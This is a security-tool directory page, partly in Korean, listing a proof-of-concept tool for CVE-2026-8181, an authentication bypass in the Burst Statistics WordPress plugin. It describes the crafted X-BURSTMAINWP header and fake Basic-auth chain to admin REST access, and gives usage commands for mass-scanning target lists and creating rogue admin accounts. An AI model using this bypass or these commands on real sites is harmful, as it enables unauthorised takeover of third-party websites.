Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-8181 — CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez. | Kitploit
도구/GitHubGitHub/murrez/cve-2026-8181
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubmurrez/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez.

저장소 보기
33개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
타이핑 인트로 EN
타이핑 인트로 TR
태그라인 EN/TR



CVE CVSS WP Python

EN: **Burst Statistics**의 인증 우회에 대한 **승인된 보안 테스트**를 위한 통제된 PoC 및 간단한 기술 노트입니다.

TR: **Burst Statistics** 플러그인의 인증 우회에 대한 **승인된 보안 테스트**를 위한 통제된 PoC 및 간단한 기술 요약입니다.


프로젝트 개요

한국어

참고: WordPress.org의 200,000+ 활성 설치 수치는 플러그인의 전체 사용자 기반을 나타내며, 모든 사이트가 취약한 버전을 실행 중임을 의미하지 않습니다. 실제 영향은 버전 + 환경(HTTP/애플리케이션 비밀번호 가용성 등)을 확인해야 합니다.


시각 자료

GitHub Flavored Markdown은 저장소에 파일이 없으면 바이너리 GIF를 포함할 수 없습니다. 위의 Typing SVG 스니펫(CDN)은 움직임을 시뮬레이션합니다. 자신의 화면 캡처를 추가하려면:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

공격 체인 (Mermaid)

root@kitploit:~
flowchart LR
  A[Client request] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Mis-handled branch| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: full admin context]
root@kitploit:~
flowchart LR
  A[İstek] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Yanlış dal| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: tam admin bağlamı]

도구 기능

-f 모드에서 -o와 --output-dir은 상호 배타적입니다.


설치

root@kitploit:~
pip3 install requests urllib3

사용 예제

root@kitploit:~
# 단일 사이트, 보고서 파일
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k

# 단일 사이트 + 새 관리자 (실험실)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k

# 대량 + 결합 파일 (성공만)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k

# 대량 + 폴더에 호스트별 파일 (성공만)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

빈 Password: 필드

성공적인 우회는 피해자 사용자의 실제 비밀번호를 유출하지 않습니다 — PoC의 Basic 비밀번호는 가짜입니다. --create-user 가 새 계정을 생성하지 않는 한 Password: 행은 비어 있습니다. 생성된 경우 생성된 비밀번호가 기록됩니다.


참고 자료

  • Burst Statistics — WordPress 플러그인 디렉토리
  • 조정된 공개에서 자주 인용: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

면책 조항

서면 승인된 평가 및 자신의 실험실에서만 사용하십시오. 무단 사용은 많은 국가에서 불법입니다. 저자와 이 README의 유지 관리자는 오용에 대해 책임을 지지 않습니다.

도구 다운로드
필드세부 사항
취약점 유형Burst Statistics의 인증 우회 (CWE-287): 조작된 헤더로 REST 요청을 전체 관리자 컨텍스트로 승격할 수 있습니다.
영향 받는 버전취약: 3.4.0, 3.4.1, 3.4.1.1 · 사용: 3.4.2 이상
심각도CVSS ~9.8 (Critical); 원격, 해당 조건에서 인증 불필요.
이 저장소CVE-2026-8181.py — 실험실 자동화: 단일 대상, 대량 목록, 스레드 풀, 선택적 TXT 출력.
기능설명
단일 대상-u 기본 URL
대량 대상-f targets.txt (한 줄에 하나의 URL; # 주석)
동시성-j N 워커 (상한 있음)
결합 파일-o file.txt — -f 사용 시 성공한 익스플로잇만 추가됨
호스트별 파일--output-dir — 성공한 경우에만 host.txt 생성 (실패는 건너뜀)
새 관리자--create-user — REST를 통해 무작위 사용자 생성 (비밀번호는 보고서에 표시됨)
TLS (실험실)-k 인증서 검증 비활성화 (신뢰할 수 있는 실험실 전용)